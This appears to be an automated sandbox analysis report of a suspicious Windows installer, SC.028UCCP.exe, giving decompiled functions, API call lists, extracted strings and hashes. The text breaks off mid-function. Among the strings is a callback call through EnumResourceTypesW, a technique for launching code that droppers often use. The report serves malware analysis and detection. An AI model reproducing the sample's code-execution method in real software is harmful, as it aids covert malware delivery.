0x00404493
0x0040449d
0x004044aa
0x004044ac
0x004044ac
0x004044ba
0x004044bf
0x004044c2
0x004044c9
0x004044cc
0x00404501
0x00404503
0x00404509
0x00404510
0x00404512
0x00404512
0x0040452e
0x00404575
0x00000000
0x00404530
0x00404533
0x00404547
0x00404549
0x00000000
0x00404549
0x004044d4
0x004044d4
0x004044e1
0x004044e6
0x00000000
0x00000000
0x004044ea
0x004044ec
0x004044ec
0x004044f4
0x004044f6
0x004044f9
0x004044fc
0x004044ff
0x00000000
0x00000000
0x00000000
0x00000000
0x004044ff
0x00404552
0x00404559
0x0040455f
0x00404567
0x0040456a
0x0040456c
0x00404578
0x00404578
0x0040457d
0x0040457f
0x00404589
0x0040458f
0x0040458f
0x00404596
0x0040459f
0x004045a9
0x004045b1
0x004045c7
0x004045b3
0x004045b7
0x004045b7
0x004045b1
0x004045cc
0x004045d1
0x004045d6
0x004045df
0x004045df
0x004045e8
0x004045ea
0x004045ea
0x004045f6
0x004045fe
0x00404608
0x00404608
0x0040460d
0x00000000
0x0040460d
0x004044cc
0x00404482
0x00404489
0x00000000
0x00000000
0x00000000
0x00404489
0x004043a8
0x004043b1
0x004043cb
0x004043d0
0x004043da
0x004043e1
0x004043ed
0x004043f0
0x004043f3
0x004043fa
0x00404402
0x00404405
0x00404409
0x00404410
0x00404418
0x00404472
0x0040441a
0x0040441b
0x00404422
0x00404427
0x0040442c
0x00404434
0x00404441
0x00404455
0x00404459
0x00404459
0x00404455
0x0040445e
0x0040446b
0x0040446b
0x00404418
0x00000000
0x004043d0
0x004043be
0x00000000
0x00000000
0x004043c4
0x00000000
0x0040432f
0x0040433c
0x00404345
0x00404352
0x00404352
0x00404359
0x0040435f
0x00404368
0x0040436b
0x0040436e
0x00404376
0x00404379
0x0040437c
0x00404382
0x00404389
0x00404390
0x00404613
0x00404625
0x00404625
0x00404399
0x00000000
0x00404399

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404335
SetWindowTextA.USER32(00000000,?), ref: 0040435F
SHBrowseForFolderA.SHELL32(?,004293F8,?), ref: 00404410
CoTaskMemFree.OLE32(00000000), ref: 0040441B
lstrcmpiA.KERNEL32(Call,0042A020), ref: 0040444D
lstrcatA.KERNEL32(?,Call), ref: 00404459
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040446B

Part of subcall function 004053AD: GetDlgItemTextA.USER32(?,?,00000400,004044A2), ref: 004053C0

Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E5B
Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E6D
Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405E7D

GetDiskFreeSpaceA.KERNEL32(00428FF0,?,?,0000040F,?,00428FF0,00428FF0,?,00000000,00428FF0,?,?,000003FB,?), ref: 00404526
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404541
SetDlgItemTextA.USER32(00000000,00000400,00428FE0), ref: 004045C7

Strings

kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 004042FF
A, xrefs: 00404409
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter, xrefs: 00404436
Call, xrefs: 00404447, 0040444C, 00404457

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 2246997448-104377302
Opcode ID: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
Instruction ID: 9abece32c8f8525092503bbe75bfebeadc75c5700619eb1d4e27c73c3de0a32c
Opcode Fuzzy Hash: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
Instruction Fuzzy Hash: F99160B1900219ABDB11AFA1CC85FAF77B8EF84314F14447BFA01B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x2c) = E00402A07(0xfffffff0);
				_t96 = E00402A07(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x30)) = E00402A07(2);
				 *((intOrPtr*)(_t100 - 8)) = E00402A07(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A07(0x45);
				if(E004056B2(_t96) == 0) {
					E00402A07(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x30)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x2c), 0xffffffff, 0x4093c0, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x4093c0, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040203f
0x00402049
0x00402052
0x0040205c
0x00402065
0x0040206f
0x00402073
0x00402073
0x00402078
0x00402089
0x00402091
0x00402171
0x00402171
0x00402178
0x00402097
0x00402097
0x004020a8
0x004020ac
0x004020b2
0x004020bc
0x004020be
0x004020c9
0x004020cc
0x004020d9
0x004020db
0x004020dd
0x004020e4
0x004020e7
0x004020e7
0x004020ea
0x004020f4
0x004020fc
0x00402101
0x0040210d
0x0040210d
0x00402110
0x00402119
0x0040211c
0x00402125
0x0040212a
0x0040213c
0x0040214b
0x0040214d
0x00402159
0x00402159
0x0040214b
0x0040215b
0x00402161
0x00402161
0x00402164
0x0040216a
0x0040216f
0x00402184
0x00000000
0x00000000
0x00000000
0x0040216f
0x0040217a
0x0040289f
0x004028ab

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093C0,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143

Strings

C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 004020C1

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
API String ID: 123533781-63491931
Opcode ID: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
Instruction ID: c2a05210b12a7f26350eeaf6b52b14759966ff166b2aa6569d537109482c51a9
Opcode Fuzzy Hash: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
Instruction Fuzzy Hash: D6415E75A00105BFCB04EFA4CD88EAE7BB9EF49314F204169F905EB2D1CA79AD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100015D0 Relevance: 2.5, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015D0(intOrPtr _a8, intOrPtr _a16) {
				void* _t11;
				void* _t14;
				void* _t17;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				_t17 = E100014D8();
				_t11 =  *0x10004050;
				if(_t11 != 0) {
					_t14 = 0;
					while( *((intOrPtr*)(_t11 + 1)) != _t17) {
						_t14 = _t11;
						_t11 =  *(_t11 + 0xc);
						if(_t11 != 0) {
							continue;
						} else {
						}
						goto L9;
					}
					if(_t14 == 0) {
						 *0x10004050 =  *(_t11 + 0xc);
					} else {
						 *(_t14 + 0xc) =  *(_t11 + 0xc);
					}
					 *0x10004040 =  *0x10004040 - 1;
					VirtualFree(_t11, 0, "true");
				}
				L9:
				return GlobalFree(_t17);
			}

0x100015d5
0x100015de
0x100015e8
0x100015ea
0x100015f1
0x100015f3
0x100015f5
0x100015fa
0x100015fc
0x10001601
0x00000000
0x00000000
0x10001603
0x00000000
0x10001601
0x10001607
0x10001614
0x10001609
0x1000160c
0x1000160c
0x1000161a
0x10001628
0x10001628
0x1000162e
0x10001636

APIs

VirtualFree.KERNEL32(?,00000000,?), ref: 10001628
GlobalFree.KERNEL32(00000000), ref: 1000162F

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Free$GlobalVirtual
String ID:
API String ID: 3500604073-0
Opcode ID: b34df644d291ab963221c1a8254174b9d8365df79b4b543f23c3eb844aad5edc
Instruction ID: a4773d772d7e4b2a4127979216d40b06861ff1443861ca1fe396b6df7f9d2e36
Opcode Fuzzy Hash: b34df644d291ab963221c1a8254174b9d8365df79b4b543f23c3eb844aad5edc
Instruction Fuzzy Hash: 4EF04F74601621DFF784CF25DC84B9A77E4FB447D0B1AC06AEA05DB268DB31D8018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040264F Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040264F(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A07(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402667
0x0040267b
0x00402686
0x00402687
0x004027c2
0x00402669
0x00402669
0x0040266b
0x0040266d
0x0040266d
0x0040289f
0x004028ab

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
Instruction ID: 0ab26aaebdd48f152f40d34805009047639191bb1b3aa8c2dea3f4c4e5e46e36
Opcode Fuzzy Hash: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
Instruction Fuzzy Hash: 0EF0A0326082109AD700E7B5A949AEEB7788B15324F60067BE101E20C2C6B969859B2E

Uniqueness

Uniqueness Score: -1.00%

Function 004062C3 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E004062C3(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406A32( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406A9A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004069F2))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409394 + __eax * 2) & 0x0000ffff =  *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409394 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406A32( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
